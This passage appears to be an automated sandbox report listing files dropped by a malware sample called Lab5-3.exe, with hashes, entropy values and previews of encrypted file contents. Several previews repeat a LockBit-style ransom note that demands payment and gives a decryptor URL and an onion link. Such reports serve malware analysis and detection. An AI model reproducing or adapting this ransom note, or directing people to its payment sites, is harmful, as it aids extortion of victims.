                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1856
                                                                                                          Entropy (8bit):7.910304524565517
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:JvJ2embY5vf0PM/HfUTid3hBaUoSGFcmeykEdEElU92i:JvkRbeUfGx0uKeY2ElUJ
                                                                                                          MD5:F4F35B103015E48D0C83812DDAFC354B
                                                                                                          SHA1:0D641B17D7783E7190FB5EA61539C38E768A3969
                                                                                                          SHA-256:87807C72B1EA350FB8113F7880CA2879312528A49FCAED7DDE34BBC8D2084449
                                                                                                          SHA-512:3BB07A124A50D586AC7D51CC8B12BB0850CA69AC076C36ABF500E22C4A18C665C849BC8E313F41A238242D96F44C35B4B830D8FA720C4EAED5760D5C94892642
                                                                                                          Malicious:false
                                                                                                          Preview:.c...W.H.....y2/....rkt^.Erk~........@+....*o...9......G:.c0x...... ......4d.;..4...K...\.*..~m5......."Q....q.a....]t....G...7v!...EY.f.......&h.Q.<..0..]`5...._...R.c.N.(..6....=bi|.4.T .{.D.......]...oH.i.8OY..% .....+.v*.X...f.Q./..#.:.`..S.o,.I.kN.....i\..........8.Ob..+.z'.S.W......H......xR.sn..@..S%....q...F.+G..T./.@.. .>I.4+..A...Q.S......w4~S...7O..E..en.DT..n.WO.d.)...V...K${^......:.....04..3R.$..r..Dgi.V....._..-.e....l.J..T.. .^..*T..dkX.7r.:C.k.R9.Z.'T..c..7m.|E\..q..N.e..F..1UC.A....P..&..d.i.=<..|Y*.f....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1856
                                                                                                          Entropy (8bit):7.890911490463454
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:dlkw2Vwm4422d1HfUTid3hBaUoSGFcmeykEdEElU92i:dG4fGx0uKeY2ElUJ
                                                                                                          MD5:9F388D776E8AC0ADA90A7A55AFD6607F
                                                                                                          SHA1:0107FFA385D90207CB941D0FC758B7DEDF73BA4C
                                                                                                          SHA-256:BE2DD5D9C23074554CB47A35310606A7CD473221BCBA2C9CDE39183232859894
                                                                                                          SHA-512:1CC9E90F1064C258939AA455DAC2D70C6A82C1FBCC6409B304BDDE93DB7C0CEB3AB894D5AFB8BB5194C7008F0299B358365C872D3360F0636B4D314B3E23B4CD
                                                                                                          Malicious:false
                                                                                                          Preview:xK....Q...m.io-4y..-.......H_Rv_.d.E#.4#.Z.DX".B.....N..C$...o..6...]..~...\x.E..U..\.......uU....n.(....c@.t.j..jVaPv....`.E....JRi.o.&...E..=..6..b...^.;.*f+}jn.a~X..A">.Zp..m..s.!..n.@..0.[.?S.1..w.e\..3fs1.7.V......#.X...9...h:........p.......m.u......F...2...Q.E..No.[..&p.S?..C...c.?f@...J..nX..]T.!H..A.B.v..s..*.4...8e.....L...A.h..{i.._....g;.B."+}...a...7&,.;V].k..V.......3....V>...[..a}Br|.6'..g..So....$.-O....`e...H.C..o.....tZ#........$.a~.I.j...o$..}+..;..GZ..o..t.^..U.....}...4(.z#....g.....H;.yP...bn. ....[C...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1856
                                                                                                          Entropy (8bit):7.889166927180154
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:lJWRMLNURSD+dX3hHfUTid3hBaUoSGFcmeykEdEElU92i:lEyLN7+dniGx0uKeY2ElUJ
                                                                                                          MD5:F2C3DCD11B2728B648878D4D4D026101
                                                                                                          SHA1:AE5B1E5B8238FE1F14AAE8DB440A84D5D9790AA4
                                                                                                          SHA-256:C8D18C71C7C8D7F0F193B65FED5A97597E5AE182FE3B140D854CA79EEA38664D
                                                                                                          SHA-512:7DEFEA732F26EC50921D3DED7DE9B3DA95E1C0195E5B4E8534B5421A21A5AB038471CC20CBC5C39009129D2DAE38A357047FF2A4D58886DCA0B73C34A7288E7A
                                                                                                          Malicious:false
                                                                                                          Preview:...'.....vy..%.25J8..J.z.0%5..Q..%.Y.o2..X......e...Y.K...`.$O.m#.w.\..X...@q....)............C.a9...r....../7....#3...)qW..'.... L....IEa..~...=qx9.......t.....O....a.S...5.C.,.W."qA...<..GLk(...\.%...jS.......)rN>.U>...'#.....1d.......i....a.h.h... ........#...#....*.O.....S.....H..2dj.E{A.v5..o.?p.U..E....\...I.R.......X...`..T.5.G.Ux.....8......s>..e....>U..4.........I..389m......$w....}].-}5.l..aYx..y..Y........#Z..zhJCE..t....yJ.E.B.{.W.......z<r..F.3..(..y.....Q.}..*5.Mo...l..V*.T;....&.......!..0.....3yb..h..r....}..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1856
                                                                                                          Entropy (8bit):7.912101440684406
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:8GnJ+f3si+gHCw9WHfUTid3hBaUoSGFcmeykEdEElU92i:8GnJO3T+1YGx0uKeY2ElUJ
                                                                                                          MD5:FC676B796F7FE19FC8C4490CC3802FB1
                                                                                                          SHA1:48ADDEAC6CBB18F13C5333CC1011FCEDA10104E3
                                                                                                          SHA-256:0FDA9D3E47D4CC9FF7BCF40B1C03C400426E7467C96843566C40B80AFDF0BE0A
                                                                                                          SHA-512:C375B9C67123BA2EBB9D2BFD6FCAA29A6053111C7ECC0A4F607A5F150B4797FD3D999F8E4942D363FF5F4B05549F2E7B06D6A3A1492940971A8913AB23C3FEF6
                                                                                                          Malicious:false
                                                                                                          Preview:...-....F.....cjn...V..>...+B.V...74.?.=~..~...g...s...+6?W.M.....1..J......i......`f$......|..e.....XKpA.F.........B&b].n...aH#@Q....)._....*q/.)x....uJ^..J....}Pf<.;....0Q..].v.....ZU.s...n'8>kG.r'...P?z."+q... .1....D...jI.}.....q.,.....w..*....T..Y_..V...F...e..E...[ZBX.u........R..^..Th\.t.g.(...:..'.T..Cys<....d...+.[.`.....d@h....Lu.N.,\B..q.'.L..$..e......2.'.Y.eZ.l... zZ..O. nV.)........%........y.....n..b.J..v.p.8.r.]z)..BU.6.=..2..w...c/..r...b:.>mI;....N{P.G.../..ky....u...F*.}r...7aI{$...R....u............*...'.....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1824
                                                                                                          Entropy (8bit):7.903992306814582
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:ouqQ1B1LGv7HfUTid3hBaUoSGFcmeykEdEElU92i:ouqQ1tGx0uKeY2ElUJ
                                                                                                          MD5:308555A821E836A0DEC46BEA6CFD84B2
                                                                                                          SHA1:B95D3C6474F26C1DAECEEDFCDE9B768AFC428928
                                                                                                          SHA-256:096C1651910D852D3F83B0D8FA947C125AEA45BA1DC27448FB34691D405BED1F
                                                                                                          SHA-512:04662AF86AAA1A18C4CFDC34BFB6E7ECAB3814BC8079A3E3C765F3C61BBFD6E1353D978001935469FECD12648307485714842A84997089280050F84F0E549D1C
                                                                                                          Malicious:false
                                                                                                          Preview:5.tc]...*.P+f...C...y~..[.a.M4.w.'f......v9UWo.j...>......k.............Y.C..N............L.;..c(...(Ud.Zo..!...P....W.,..A;.....Viv...1.......h...&......;....M....Z...<.G.~...q.E.XZ6..e.3....+E.[',?...H....l.?.[...o.Wy.2.t|.......I..e..^.._*... ..n..5..U.....x....2...i.eF......H.:.?...............H.0.T#9)..-O.i.".....cu..D6...FZy..V...7....j.6& .....Q.q.{.2.k ....P.2......";.....9X6....%....{........5.T|.".Gt.....Yo..,. ..P.....$B.._...J'.T[.uuH..(e.~......H..Bh.)W..........a..5Q......>..).C?v.K..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1856
                                                                                                          Entropy (8bit):7.897947148675018
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:KfzgYj84HfUTid3hBaUoSGFcmeykEdEElU92i:QhKGx0uKeY2ElUJ
                                                                                                          MD5:B8B54FD6510617CA9D4417F83A0472F0
                                                                                                          SHA1:E86040DE05AB0DA7E8059D74CA0578722BB7E084
                                                                                                          SHA-256:E3CEA5687F982FBA3F66DBBD2E16BB199465F55FB92C13FD849E16168A4B5C92
                                                                                                          SHA-512:8936EFBD9F6EF5C19B15CB2FBDB9AD2830EDFB034C4085D413F6EBED1F93372715BB1D48D638FB397130BD6149D2519BBECED1EA6BEA54A0B9A30E2EA475C66A
                                                                                                          Malicious:false
                                                                                                          Preview:.X.pX..._.W4W-....;0.m-.7.q.i...7..ug...8.cp.....j..=W<.A..tcN.1...A...x..d.Y.|......f..dQS..rm..[y....r....t......R...~:.....};1.._.x..........MDxeM...4..C.......j,=..<..Epa44zI.r....g..LK*.r.94.\.Z].I..r...B...(w.-..x.q;qM..Pq..:.W.#...5......{4..RM+.!.s41w.9.."[a<'Ru.9?.....2v.l5.P...\kW...Ys..*Ok.K...~.....Wf.1..b........W.|.0..`W..5.....=...4%/(..P....e.]..2....Q...w;..E\._...R..p....S.R..T-.IL"G...q.}.....v...?.}.....r....l..0.b-|....PLL.p.|.](.....K...n.@..p..&.....G.b....\...t....!...iY....*.?z.U%..8...!.S..E...t..*O...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1856
                                                                                                          Entropy (8bit):7.905437903451345
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:1vDsZJEvl7omzpQaHfUTid3hBaUoSGFcmeykEdEElU92i:1vZv7pQ1Gx0uKeY2ElUJ
                                                                                                          MD5:EF948A8AC2A776B24E5184566111ED22
                                                                                                          SHA1:A18DEF0C51F9FFB6D4B4404F646DE3997914F1EE
                                                                                                          SHA-256:59D24617558274B12F21C3B53EB1B0C357BD7A85D15BBF33AA00D25DBB11603B
                                                                                                          SHA-512:FEFC745518C6ACFC9C05528617A72F10B6CF5587916218F119344D452DC622DE9EF34FC1962FA472976E7BF9E0E3169BCA1ECB3A70F7C81A96D93C23D68E3DB9
                                                                                                          Malicious:false
                                                                                                          Preview:X....kTX../....;........m..V....6.m..'.......Oi.....9?..Qz%..l:......qR.0.....8soA.7...jM.}.;...^..knfD{.<Pxw...|....y.m....j...A..p.\R...]p.K... ..B.@..t...j.p..h.Jg.......Y.?a..]...OS..H6. ...A.....*.Fu........)_i&.t.&.Z..J..$....?..QB..?d.pLm.HEI.`....!....E......Q1....Z.s.... ..lu..@..._T.(...a........q#y..3.{A..Z.E..........Du..../b.L...$..\..l?...h.AS...{..1.....q'...\....},fse......x....n.l.....n..y...s...7.G...Y.-..i.1....>J..kvG....=........g..u..kkv|...e0....y.cX.s.yQ...Tv.T...Z.8...T..9.>..h.?..3.........=...u..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1856
                                                                                                          Entropy (8bit):7.895242576619135
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:BMmPF1BzwGgoTHfUTid3hBaUoSGFcmeykEdEElU92i:B75AogGx0uKeY2ElUJ
                                                                                                          MD5:069C54AEB461D96DF6BAE0B8C2C7A82E
                                                                                                          SHA1:4C676E8C77CFDC8F19A3768F07DB2C200E1A3424
                                                                                                          SHA-256:3ABE0275095F193C69D4D9D52581A8AD69A1B3385EF902ABDD3A3F32DB1B6348
                                                                                                          SHA-512:F16C77A78ED2EFA9028A8B57C1880517C8DCDD0180B5540BD3C167756E0CE6FBEB836501CAEDA286844F1FB35AF24A37F29E2525223B9FCB8AAD9D3A66FEAC1E
                                                                                                          Malicious:false
                                                                                                          Preview:.*.4.gX....S.~...(....*..NqnP.P...e....r...nW#;....$...|......_s....3.m)3...3J..g8+n0.f......Z9.{....^(...w..M.-..2..!P.....4.I..a.X$..S..U.....S...0..+_..o.....d..'Xq.^...k..M.~....T.......|...(.Q.up..w..S.{ea&.! S..!B..T8...R....HD.JH...%;.K.l.2..B..6.4VGxc...(..C...-..N<:...h....W.....}.........hNN..IB.......k..4..U.X...j.......#$m..<...D~.I..R/.N'.k7.d..1..q.6.C..!...r.H.:.(..?0..F.!.-.....A.Z>.4.R.oA...C.....,.s.C.Z.;.....GQ/......F.JO?[)...A...z-.xG.o..L.m...=.q.v.....5a..`...`.N0BQQu.l.F.?r+.^..`.m.(Q%...)........f...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Secret Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1856
                                                                                                          Entropy (8bit):7.899905960404141
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:FFjMYXPuNRZhP9HfUTid3hBaUoSGFcmeykEdEElU92i:FFjzuNd+Gx0uKeY2ElUJ
                                                                                                          MD5:CC23E09C6DB7FD68D0085550EBE5FD5A
                                                                                                          SHA1:A7FFDA86923C88FA4A5EA448C0C548B541AC36AB
                                                                                                          SHA-256:3D77970901BDEA6EB0BE7BCB8244EE707157ECB72CEE76E14DF06830940E0743
                                                                                                          SHA-512:C66F2F3B3400F129DE7DA26A02886DFA09B26C38A8CF63BEFF805B3CE26FB697E8E1B379142F2B0A3D0F211A11055369D372E7734D4B69DF0E5DB8E044708F75
                                                                                                          Malicious:false
                                                                                                          Preview:....T;`0}.f..P*gt'..../...{?.H...]..8.V........i..qU.0.U....cB..._.0...L..0...e.b..@..t...t2.u.F..j...b./w.U8.g.%..nxk..e..RS..J_d..c....M.az."B.+^.:...M....>g.g....r. b.^.Sd..gb...*P.>.|.z..h.X,..v..K.?..[+`..............v..?\.$.Z...:.....>`r..|._d.(j..U...y])..."......D.`=m..O.....=^..c..U.D.. ..Ln.E........u...F....c.zt$.........y...<...GX.M..~......DI.....#+...P&]...2.....n.X.&<iFT.V....p.|.:...G..!..H...\.._.AA}.r...-n].=+..+;.!1.Y.l.Cy^".I~...*Oo.....)bzHr.k...!....%.^U....D.......;']^...Q...p.a.=l7.$...>....n..!.I.,.....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1824
                                                                                                          Entropy (8bit):7.903071776211823
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:jEtujJJ/oCHfUTid3hBaUoSGFcmeykEdEElU92i:jTFBcGx0uKeY2ElUJ
                                                                                                          MD5:CCDB2F076546B98F5E1EF4670B2B8438
                                                                                                          SHA1:AB19D698F586D592F94999BC747A13EA8C481ED9
                                                                                                          SHA-256:8CF47FDA464422B7FB1067D1FF95591E79B10648E8AE62F3E7D68355AE58ECF3
                                                                                                          SHA-512:25BF55241F748AA9602A8EFCD6B4ED08C07894BA3C0E2DFA5C8F42F5A0C33572874937056C61D5E9CCDFED9D8C1965853E03F7E493C53402C1D2F9E930E2057C
                                                                                                          Malicious:false
                                                                                                          Preview:..Kt.h.....$....s.CQZ.A..%..<.........2d.......U.V.(....D......u....4@.......fF"(.8u!......F....@..n....wa.+....9.E...|...,...D.._..P..ALU..Zx.yG.n.xc..U..E...mK.#.i.l..po.X.,........j...i...;H.2...'...a..w7..n......Z....-.j.2.......%wh...l.|...T.S_.&..|;...V+...}..kae.'L....Q.........CY........0....}..`'/O.vdW....M..U.J\1..d.%...E.b9.1.)......E.....#eaV(.....M...%R...<.f..x.8Po..T.F.....>.{.....+u.g.t......wE.E\j.K...Q......v..,...*..,.]..N.BnD.....8.....D....L.UAH.^{..A.k9N......C..,..[..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1840
                                                                                                          Entropy (8bit):7.895041119959038
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:TX2P5nk+kHfUTid3hBaUoSGFcmeykEdEElU92i:TX2RnjGx0uKeY2ElUJ
                                                                                                          MD5:7B41D68AEBE2D1D5D071EDA8D68C350F
                                                                                                          SHA1:DA1C337AB57A16FDA4821410590BCD30FBE9D4EE
                                                                                                          SHA-256:1C1D06849883FCDB3B25E8D221257B207DEC0DD7FA61831AC7D0C77A7F791BD1
                                                                                                          SHA-512:495854D710331FA0F7FDA45A610CE1F00B2DAF6EDBE2E53539BF5C7BDE26A4F15B679431F60F398FCE8641D4ACAE29776244695640F5644E01E93DC12D3DF9D9
                                                                                                          Malicious:false
                                                                                                          Preview:.;.5..n(s5..>UB..1Il./..j.F...&.A(.1t..r....}2...\M^.r..5.......t......m...~..^.P.a....g......<.,S......H.gb...p....W8.,.p..c...=%O<W..BMR.~Q.Po.5......I....|:...g0.....No.2......B.$.=....X..y......HD.L...j.|...Ey.n]....Day3....<.:...s..[.....d...|2>".r...xT...-.(tfo$O......k......U?.F..f.\!..(....8..FF..B".j..F..PA..Q...T.....%.......UNah-MO.."'S...Q.............[.`.y..@h..[H+...0.Y...ph...-lL..N@..f....@..R.9%.Ja....#..*cp.a)......m...%...n.{..w.i.9o..'1u..@f4r.Q..A*....cE.aN....h#k..mv-5..4sI.......?.......f..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1840
                                                                                                          Entropy (8bit):7.900839681365501
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:dETKiEu01OQ9mHfUTid3hBaUoSGFcmeykEdEElU92i:m8395Gx0uKeY2ElUJ
                                                                                                          MD5:1E44C886C8C7E8E475FA892A151B0B18
                                                                                                          SHA1:2F5E5ED0C158E571D0297AF385BE68CADD676761
                                                                                                          SHA-256:27EAC63CA7F8A5ED4249AE6C693B071343D2BB510492796EFCA8C00B9F8276CC
                                                                                                          SHA-512:08D7E8FEC8649C1B70E0EB0CFE25A5B41A2437E60943D387E9DE40F86D791AD3BD9914EDD282C401DC3A48532DCD979C9E26674776CE6D5AA5A0918D9470CB19
                                                                                                          Malicious:false
                                                                                                          Preview:u.~....~.B..].H.H.2.\..E..<.[.>Y...4.....=....X..w...B....y..FT,#.....S\c...CU.X.(1....ci.O....."....f......_...6..G.....).l2n9..}WBu,...}..L.....T.m.g.D...}r.......cNY2.......$......!R..t. .E....}..9i N.T.`...*.=}..i.%.`71..t..'P..!...}.....\lZ!.....G..2.j.5...F....dF...5..&.....0.(.(,.cu.NJ.....[...@.M.w..\.B..m..V_.......6.#.,x........?ssfx..t.@.L......`..~N.D.#..iwjz..3...H..]...*.u]j.L..G\..T.c..{........r.......;....."..]U..(D.(..w.$.8.e.8..e4...(.V..!a.{...-... t.....%F.Z...-..$,.y....B.n....&9.|c!!...|.8.|..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
